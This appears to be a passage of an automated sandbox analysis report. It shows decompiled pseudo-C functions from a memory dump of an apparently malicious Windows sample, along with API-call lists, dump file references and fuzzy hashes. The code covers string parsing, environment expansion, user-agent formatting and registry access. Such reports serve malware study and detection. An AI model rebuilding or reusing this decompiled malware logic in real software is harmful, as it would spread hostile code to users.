                                                                                                                                                                                              					_t23 = _t23 + 1;
                                                                                                                                                                                              					_push(0x20);
                                                                                                                                                                                              					_push( &(_t8[1]));
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t12 = E00DF58BE(_t23 << 2);
                                                                                                                                                                                              				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                                                                                                                                                              				if(_t12 != 0) {
                                                                                                                                                                                              					StrTrimA(_t21, 0xdfc28c); // executed
                                                                                                                                                                                              					_t26 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t24 = StrChrA(_t21, 0x20);
                                                                                                                                                                                              						if(_t24 != 0) {
                                                                                                                                                                                              							 *_t24 = 0;
                                                                                                                                                                                              							_t24 =  &(_t24[1]);
                                                                                                                                                                                              							StrTrimA(_t24, 0xdfc28c);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t2 = _t27 + 0x10; // 0x4d283a53
                                                                                                                                                                                              						 *( *_t2 + _t26 * 4) = _t21;
                                                                                                                                                                                              						_t26 = _t26 + 1;
                                                                                                                                                                                              						_t21 = _t24;
                                                                                                                                                                                              					} while (_t24 != 0);
                                                                                                                                                                                              					_t6 = _t27 + 0x10; // 0x4d283a53
                                                                                                                                                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}










                                                                                                                                                                                              0x00df7c80
                                                                                                                                                                                              0x00df7c84
                                                                                                                                                                                              0x00df7c86
                                                                                                                                                                                              0x00df7c87
                                                                                                                                                                                              0x00df7c8f
                                                                                                                                                                                              0x00df7c8f
                                                                                                                                                                                              0x00df7c93
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df7c8a
                                                                                                                                                                                              0x00df7c8b
                                                                                                                                                                                              0x00df7c8e
                                                                                                                                                                                              0x00df7c8e
                                                                                                                                                                                              0x00df7c9b
                                                                                                                                                                                              0x00df7ca0
                                                                                                                                                                                              0x00df7ca6
                                                                                                                                                                                              0x00df7cae
                                                                                                                                                                                              0x00df7cb4
                                                                                                                                                                                              0x00df7cb6
                                                                                                                                                                                              0x00df7cbb
                                                                                                                                                                                              0x00df7cbf
                                                                                                                                                                                              0x00df7cc1
                                                                                                                                                                                              0x00df7cc4
                                                                                                                                                                                              0x00df7ccb
                                                                                                                                                                                              0x00df7ccb
                                                                                                                                                                                              0x00df7cd1
                                                                                                                                                                                              0x00df7cd5
                                                                                                                                                                                              0x00df7cd8
                                                                                                                                                                                              0x00df7cd9
                                                                                                                                                                                              0x00df7cdb
                                                                                                                                                                                              0x00df7ce3
                                                                                                                                                                                              0x00df7ce7
                                                                                                                                                                                              0x00df7ce7
                                                                                                                                                                                              0x00df7cf4

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • StrChrA.SHLWAPI(?,00000020,00000000,04C095AC,?,?,?,00DF4C85,04C095AC,?,?,?,00DF4A8B,?,?,?), ref: 00DF7C8F
                                                                                                                                                                                              • StrTrimA.KERNELBASE(?,00DFC28C,00000002,?,?,?,00DF4C85,04C095AC,?,?,?,00DF4A8B,?,?,?,4D283A53), ref: 00DF7CAE
                                                                                                                                                                                              • StrChrA.SHLWAPI(?,00000020,?,?,?,00DF4C85,04C095AC,?,?,?,00DF4A8B,?,?,?,4D283A53,?), ref: 00DF7CB9
                                                                                                                                                                                              • StrTrimA.SHLWAPI(00000001,00DFC28C,?,?,?,00DF4C85,04C095AC,?,?,?,00DF4A8B,?,?,?,4D283A53,?), ref: 00DF7CCB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Trim
                                                                                                                                                                                              • String ID: S:(M
                                                                                                                                                                                              • API String ID: 3043112668-2217774225
                                                                                                                                                                                              • Opcode ID: 035c8c8f415214a9fcf1d422a80209b9fafe9a836b3264db62faeef58d218907
                                                                                                                                                                                              • Instruction ID: 10fec2be77a900a4ce66d86788931a879843c1a73d9517ed05290484ddcceba5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 035c8c8f415214a9fcf1d422a80209b9fafe9a836b3264db62faeef58d218907
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6701B5716093196FD2219F698C48E7BBE99EB45B90F16C519FA81C7340DB60C80182F4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                              			E00DF4908(signed int __edx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				CHAR* _v16;
                                                                                                                                                                                              				long _v20;
                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                              				CHAR* _t22;
                                                                                                                                                                                              				CHAR* _t25;
                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                              				CHAR* _t36;
                                                                                                                                                                                              				CHAR* _t42;
                                                                                                                                                                                              				CHAR* _t43;
                                                                                                                                                                                              				CHAR* _t44;
                                                                                                                                                                                              				CHAR* _t46;
                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                              				void* _t51;
                                                                                                                                                                                              				signed char _t56;
                                                                                                                                                                                              				intOrPtr _t58;
                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                              				CHAR* _t67;
                                                                                                                                                                                              				CHAR* _t68;
                                                                                                                                                                                              				char* _t69;
                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t61 = __edx;
                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                              				_t21 = E00DF11AF();
                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                              					_t59 =  *0xdfd25c; // 0x4000000a
                                                                                                                                                                                              					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                              					 *0xdfd25c = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t22 =  *0xdfd164(0, 2);
                                                                                                                                                                                              				_v16 = _t22;
                                                                                                                                                                                              				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                              					_t25 = E00DF1111( &_v8,  &_v20); // executed
                                                                                                                                                                                              					_t54 = _t25;
                                                                                                                                                                                              					_t26 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					if( *0xdfd25c > 5) {
                                                                                                                                                                                              						_t8 = _t26 + 0xdfe5cd; // 0x4d283a53
                                                                                                                                                                                              						_t27 = _t8;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t7 = _t26 + 0xdfea05; // 0x44283a44
                                                                                                                                                                                              						_t27 = _t7;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E00DF1EC4(_t27, _t27);
                                                                                                                                                                                              					_t31 = E00DF1A4E(_t61,  &_v20,  &_v12); // executed
                                                                                                                                                                                              					if(_t31 == 0) {
                                                                                                                                                                                              						CloseHandle(_v20);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t63 = 5;
                                                                                                                                                                                              					if(_t54 != _t63) {
                                                                                                                                                                                              						 *0xdfd270 =  *0xdfd270 ^ 0x81bbe65d;
                                                                                                                                                                                              						_t32 = E00DF58BE(0x60);
                                                                                                                                                                                              						 *0xdfd324 = _t32;
                                                                                                                                                                                              						__eflags = _t32;
                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                              							_push(8);
                                                                                                                                                                                              							_pop(0);
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							memset(_t32, 0, 0x60);
                                                                                                                                                                                              							_t49 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              							_t70 = _t70 + 0xc;
                                                                                                                                                                                              							__imp__(_t49 + 0x40);
                                                                                                                                                                                              							_t51 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              							 *_t51 = 0xdfe845;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t54 = 0;
                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                              						if(0 == 0) {
                                                                                                                                                                                              							_t36 = RtlAllocateHeap( *0xdfd238, 0, 0x43);
                                                                                                                                                                                              							 *0xdfd2c4 = _t36;
                                                                                                                                                                                              							__eflags = _t36;
                                                                                                                                                                                              							if(_t36 == 0) {
                                                                                                                                                                                              								_push(8);
                                                                                                                                                                                              								_pop(0);
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t56 =  *0xdfd25c; // 0x4000000a
                                                                                                                                                                                              								_t61 = _t56 & 0x000000ff;
                                                                                                                                                                                              								_t58 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              								_t13 = _t58 + 0xdfe55a; // 0x697a6f4d
                                                                                                                                                                                              								_t55 = _t13;
                                                                                                                                                                                              								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xdfc28f);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t54 = 0;
                                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                                              							if(0 == 0) {
                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                              								E00DF93D5( ~_v8 &  *0xdfd270, 0xdfd00c); // executed
                                                                                                                                                                                              								_t42 = E00DF98F7(0, _t55, _t63, 0xdfd00c); // executed
                                                                                                                                                                                              								_t54 = _t42;
                                                                                                                                                                                              								__eflags = _t54;
                                                                                                                                                                                              								if(_t54 != 0) {
                                                                                                                                                                                              									goto L30;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t43 = E00DF205B(_t55); // executed
                                                                                                                                                                                              								__eflags = _t43;
                                                                                                                                                                                              								if(_t43 != 0) {
                                                                                                                                                                                              									__eflags = _v8;
                                                                                                                                                                                              									_t67 = _v12;
                                                                                                                                                                                              									if(_v8 != 0) {
                                                                                                                                                                                              										L29:
                                                                                                                                                                                              										_t44 = E00DF9B6F(_t61, _t67, _v8); // executed
                                                                                                                                                                                              										_t54 = _t44;
                                                                                                                                                                                              										goto L30;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _t67;
                                                                                                                                                                                              									if(__eflags == 0) {
                                                                                                                                                                                              										goto L30;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t46 = E00DF6CD3(__eflags,  &(_t67[4])); // executed
                                                                                                                                                                                              									_t54 = _t46;
                                                                                                                                                                                              									__eflags = _t54;
                                                                                                                                                                                              									if(_t54 == 0) {
                                                                                                                                                                                              										goto L30;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L29;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t54 = 8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t68 = _v12;
                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                              							L30:
                                                                                                                                                                                              							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                              								 *0xdfd160();
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L34;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t69 =  &(_t68[4]);
                                                                                                                                                                                              						do {
                                                                                                                                                                                              						} while (E00DF7827(_t63, _t69, 0, 1) == 0x4c7);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t54 = _t22;
                                                                                                                                                                                              					L34:
                                                                                                                                                                                              					return _t54;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}
































                                                                                                                                                                                              0x00df4908
                                                                                                                                                                                              0x00df4912
                                                                                                                                                                                              0x00df4915
                                                                                                                                                                                              0x00df4918
                                                                                                                                                                                              0x00df491b
                                                                                                                                                                                              0x00df4922
                                                                                                                                                                                              0x00df4924
                                                                                                                                                                                              0x00df4930
                                                                                                                                                                                              0x00df4932
                                                                                                                                                                                              0x00df4932
                                                                                                                                                                                              0x00df493b
                                                                                                                                                                                              0x00df4941
                                                                                                                                                                                              0x00df4946
                                                                                                                                                                                              0x00df4960
                                                                                                                                                                                              0x00df496c
                                                                                                                                                                                              0x00df496e
                                                                                                                                                                                              0x00df4973
                                                                                                                                                                                              0x00df497d
                                                                                                                                                                                              0x00df497d
                                                                                                                                                                                              0x00df4975
                                                                                                                                                                                              0x00df4975
                                                                                                                                                                                              0x00df4975
                                                                                                                                                                                              0x00df4975
                                                                                                                                                                                              0x00df4984
                                                                                                                                                                                              0x00df4991
                                                                                                                                                                                              0x00df4998
                                                                                                                                                                                              0x00df499d
                                                                                                                                                                                              0x00df499d
                                                                                                                                                                                              0x00df49a6
                                                                                                                                                                                              0x00df49a9
                                                                                                                                                                                              0x00df49cf
                                                                                                                                                                                              0x00df49db
                                                                                                                                                                                              0x00df49e0
                                                                                                                                                                                              0x00df49e5
                                                                                                                                                                                              0x00df49e7
                                                                                                                                                                                              0x00df4a13
                                                                                                                                                                                              0x00df4a15
                                                                                                                                                                                              0x00df49e9
                                                                                                                                                                                              0x00df49ed
                                                                                                                                                                                              0x00df49f2
                                                                                                                                                                                              0x00df49f7
                                                                                                                                                                                              0x00df49fe
                                                                                                                                                                                              0x00df4a04
                                                                                                                                                                                              0x00df4a09
                                                                                                                                                                                              0x00df4a0f
                                                                                                                                                                                              0x00df4a16
                                                                                                                                                                                              0x00df4a18
                                                                                                                                                                                              0x00df4a1a
                                                                                                                                                                                              0x00df4a29
                                                                                                                                                                                              0x00df4a2f
                                                                                                                                                                                              0x00df4a34
                                                                                                                                                                                              0x00df4a36
                                                                                                                                                                                              0x00df4a66
                                                                                                                                                                                              0x00df4a68
                                                                                                                                                                                              0x00df4a38
                                                                                                                                                                                              0x00df4a38
                                                                                                                                                                                              0x00df4a3e
                                                                                                                                                                                              0x00df4a4b
                                                                                                                                                                                              0x00df4a51
                                                                                                                                                                                              0x00df4a51
                                                                                                                                                                                              0x00df4a59
                                                                                                                                                                                              0x00df4a62
                                                                                                                                                                                              0x00df4a69
                                                                                                                                                                                              0x00df4a6b
                                                                                                                                                                                              0x00df4a6d
                                                                                                                                                                                              0x00df4a74
                                                                                                                                                                                              0x00df4a81
                                                                                                                                                                                              0x00df4a86
                                                                                                                                                                                              0x00df4a8b
                                                                                                                                                                                              0x00df4a8d
                                                                                                                                                                                              0x00df4a8f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df4a91
                                                                                                                                                                                              0x00df4a96
                                                                                                                                                                                              0x00df4a98
                                                                                                                                                                                              0x00df4a9f
                                                                                                                                                                                              0x00df4aa3
                                                                                                                                                                                              0x00df4aa6
                                                                                                                                                                                              0x00df4abb
                                                                                                                                                                                              0x00df4abf
                                                                                                                                                                                              0x00df4ac4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df4ac4
                                                                                                                                                                                              0x00df4aa8
                                                                                                                                                                                              0x00df4aaa
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df4ab0
                                                                                                                                                                                              0x00df4ab5
                                                                                                                                                                                              0x00df4ab7
                                                                                                                                                                                              0x00df4ab9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df4ab9
                                                                                                                                                                                              0x00df4a9c
                                                                                                                                                                                              0x00df4a9c
                                                                                                                                                                                              0x00df4a6d
                                                                                                                                                                                              0x00df49ab
                                                                                                                                                                                              0x00df49ab
                                                                                                                                                                                              0x00df49b0
                                                                                                                                                                                              0x00df4ac6
                                                                                                                                                                                              0x00df4acb
                                                                                                                                                                                              0x00df4ad3
                                                                                                                                                                                              0x00df4ad3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df4acb
                                                                                                                                                                                              0x00df49b6
                                                                                                                                                                                              0x00df49b9
                                                                                                                                                                                              0x00df49c3
                                                                                                                                                                                              0x00df49ca
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df4adb
                                                                                                                                                                                              0x00df4adb
                                                                                                                                                                                              0x00df4ade
                                                                                                                                                                                              0x00df4ae2
                                                                                                                                                                                              0x00df4ae2

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00DF11AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,00DF4920,00000001), ref: 00DF11BE
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00DF499D
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              • memset.NTDLL ref: 00DF49ED
                                                                                                                                                                                              • RtlInitializeCriticalSection.NTDLL(04C09570), ref: 00DF49FE
                                                                                                                                                                                                • Part of subcall function 00DF6CD3: memset.NTDLL ref: 00DF6CED
                                                                                                                                                                                                • Part of subcall function 00DF6CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00DF6D24
                                                                                                                                                                                                • Part of subcall function 00DF6CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00DF4AB5), ref: 00DF6D2F
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00DF4A29
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF4A59
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4246211962-0
                                                                                                                                                                                              • Opcode ID: ab608cd35edae23aee6586addf104d406ff6d00172e9290c582a0db31082f9d3
                                                                                                                                                                                              • Instruction ID: e528b305254de1c4039fe8bc33aa0fe7ac5a2da9ce1e13ce2a01e171a5b8de45
                                                                                                                                                                                              • Opcode Fuzzy Hash: ab608cd35edae23aee6586addf104d406ff6d00172e9290c582a0db31082f9d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 77519E71A4031DABDB21EBA4DD49B7F77AAAB04708F1AC415E701E7291E670D900CBB8
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                                              			E00DF6CD3(void* __eflags, WCHAR* _a4) {
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				void _v48;
                                                                                                                                                                                              				int _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				void* _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                                                              				int _v76;
                                                                                                                                                                                              				WCHAR* _v84;
                                                                                                                                                                                              				intOrPtr _v88;
                                                                                                                                                                                              				intOrPtr _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				intOrPtr _t40;
                                                                                                                                                                                              				int _t45;
                                                                                                                                                                                              				char _t50;
                                                                                                                                                                                              				intOrPtr _t52;
                                                                                                                                                                                              				void* _t55;
                                                                                                                                                                                              				intOrPtr _t67;
                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                              				void* _t81;
                                                                                                                                                                                              				WCHAR* _t90;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v52 = 0;
                                                                                                                                                                                              				memset( &_v48, 0, 0x2c);
                                                                                                                                                                                              				_v76 = 0;
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				_t40 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t5 = _t40 + 0xdfee24; // 0x410025
                                                                                                                                                                                              				_t90 = E00DF4814(_t5);
                                                                                                                                                                                              				_v84 = _t90;
                                                                                                                                                                                              				if(_t90 == 0) {
                                                                                                                                                                                              					_t81 = 8;
                                                                                                                                                                                              					L24:
                                                                                                                                                                                              					return _t81;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                                                                                                                                                                              				if(_t45 != 0) {
                                                                                                                                                                                              					_t81 = 1;
                                                                                                                                                                                              					L22:
                                                                                                                                                                                              					E00DF147E(_v88);
                                                                                                                                                                                              					goto L24;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(E00DF9138(0,  &_v96) != 0) {
                                                                                                                                                                                              					_v96 = 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t50 = E00DFA5E9(0,  *0xdfd33c);
                                                                                                                                                                                              				_v96 = _t50;
                                                                                                                                                                                              				if(_t50 == 0) {
                                                                                                                                                                                              					_t81 = 8;
                                                                                                                                                                                              					goto L19;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t52 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t11 = _t52 + 0xdfe81a; // 0x65696c43
                                                                                                                                                                                              					_t55 = E00DFA5E9(0, _t11);
                                                                                                                                                                                              					_t93 = _t55;
                                                                                                                                                                                              					if(_t55 == 0) {
                                                                                                                                                                                              						_t81 = 8;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t81 = E00DF74B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                                                                                                                                                                              						E00DF147E(_t93);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t81 != 0) {
                                                                                                                                                                                              						L17:
                                                                                                                                                                                              						E00DF147E(_v92);
                                                                                                                                                                                              						L19:
                                                                                                                                                                                              						_t92 = _v96;
                                                                                                                                                                                              						if(_v96 != 0) {
                                                                                                                                                                                              							E00DF568A(_t92);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						if(( *0xdfd260 & 0x00000001) == 0) {
                                                                                                                                                                                              							L14:
                                                                                                                                                                                              							E00DF6E92(_t81, _v60, _v56,  *0xdfd270, 0);
                                                                                                                                                                                              							_t81 = E00DF6737(_v72,  &_v64,  &_v60, 0);
                                                                                                                                                                                              							if(_t81 == 0) {
                                                                                                                                                                                              								_v68 = _v96;
                                                                                                                                                                                              								_v64 =  &_v60;
                                                                                                                                                                                              								_t81 = E00DF72F2( &_v84, 0);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							E00DF147E(_v60);
                                                                                                                                                                                              							goto L17;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t67 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              						_t18 = _t67 + 0xdfe823; // 0x65696c43
                                                                                                                                                                                              						_t70 = E00DFA5E9(0, _t18);
                                                                                                                                                                                              						_t95 = _t70;
                                                                                                                                                                                              						if(_t70 == 0) {
                                                                                                                                                                                              							_t81 = 8;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t22 =  &_v96; // 0x65696c43
                                                                                                                                                                                              							_t81 = E00DF74B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                                                                                                                                                                              							E00DF147E(_t95);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t81 != 0) {
                                                                                                                                                                                              							goto L17;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}




























                                                                                                                                                                                              0x00df6ce9
                                                                                                                                                                                              0x00df6ced
                                                                                                                                                                                              0x00df6cf4
                                                                                                                                                                                              0x00df6cfc
                                                                                                                                                                                              0x00df6cfd
                                                                                                                                                                                              0x00df6cfe
                                                                                                                                                                                              0x00df6cff
                                                                                                                                                                                              0x00df6d00
                                                                                                                                                                                              0x00df6d01
                                                                                                                                                                                              0x00df6d09
                                                                                                                                                                                              0x00df6d15
                                                                                                                                                                                              0x00df6d17
                                                                                                                                                                                              0x00df6d1d
                                                                                                                                                                                              0x00df6e86
                                                                                                                                                                                              0x00df6e87
                                                                                                                                                                                              0x00df6e8f
                                                                                                                                                                                              0x00df6e8f
                                                                                                                                                                                              0x00df6d2f
                                                                                                                                                                                              0x00df6d37
                                                                                                                                                                                              0x00df6e78
                                                                                                                                                                                              0x00df6e79
                                                                                                                                                                                              0x00df6e7d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df6e7d
                                                                                                                                                                                              0x00df6d4a
                                                                                                                                                                                              0x00df6d4c
                                                                                                                                                                                              0x00df6d4c
                                                                                                                                                                                              0x00df6d58
                                                                                                                                                                                              0x00df6d5d
                                                                                                                                                                                              0x00df6d63
                                                                                                                                                                                              0x00df6e66
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df6d69
                                                                                                                                                                                              0x00df6d69
                                                                                                                                                                                              0x00df6d6e
                                                                                                                                                                                              0x00df6d77
                                                                                                                                                                                              0x00df6d7c
                                                                                                                                                                                              0x00df6d85
                                                                                                                                                                                              0x00df6dac
                                                                                                                                                                                              0x00df6d87
                                                                                                                                                                                              0x00df6da1
                                                                                                                                                                                              0x00df6da3
                                                                                                                                                                                              0x00df6da3
                                                                                                                                                                                              0x00df6daf
                                                                                                                                                                                              0x00df6e59
                                                                                                                                                                                              0x00df6e5d
                                                                                                                                                                                              0x00df6e67
                                                                                                                                                                                              0x00df6e67
                                                                                                                                                                                              0x00df6e6d
                                                                                                                                                                                              0x00df6e6f
                                                                                                                                                                                              0x00df6e6f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df6db5
                                                                                                                                                                                              0x00df6dbc
                                                                                                                                                                                              0x00df6e01
                                                                                                                                                                                              0x00df6e14
                                                                                                                                                                                              0x00df6e2d
                                                                                                                                                                                              0x00df6e31
                                                                                                                                                                                              0x00df6e37
                                                                                                                                                                                              0x00df6e3f
                                                                                                                                                                                              0x00df6e4e
                                                                                                                                                                                              0x00df6e4e
                                                                                                                                                                                              0x00df6e54
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df6e54
                                                                                                                                                                                              0x00df6dbe
                                                                                                                                                                                              0x00df6dc3
                                                                                                                                                                                              0x00df6dcc
                                                                                                                                                                                              0x00df6dd1
                                                                                                                                                                                              0x00df6dd5
                                                                                                                                                                                              0x00df6dfc
                                                                                                                                                                                              0x00df6dd7
                                                                                                                                                                                              0x00df6de7
                                                                                                                                                                                              0x00df6df1
                                                                                                                                                                                              0x00df6df3
                                                                                                                                                                                              0x00df6df3
                                                                                                                                                                                              0x00df6dff
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df6dff
                                                                                                                                                                                              0x00df6daf

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 00DF6CED
                                                                                                                                                                                                • Part of subcall function 00DF4814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00DF6D15,00410025,00000005,?,00000000), ref: 00DF4825
                                                                                                                                                                                                • Part of subcall function 00DF4814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00DF4842
                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00DF6D24
                                                                                                                                                                                              • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00DF4AB5), ref: 00DF6D2F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
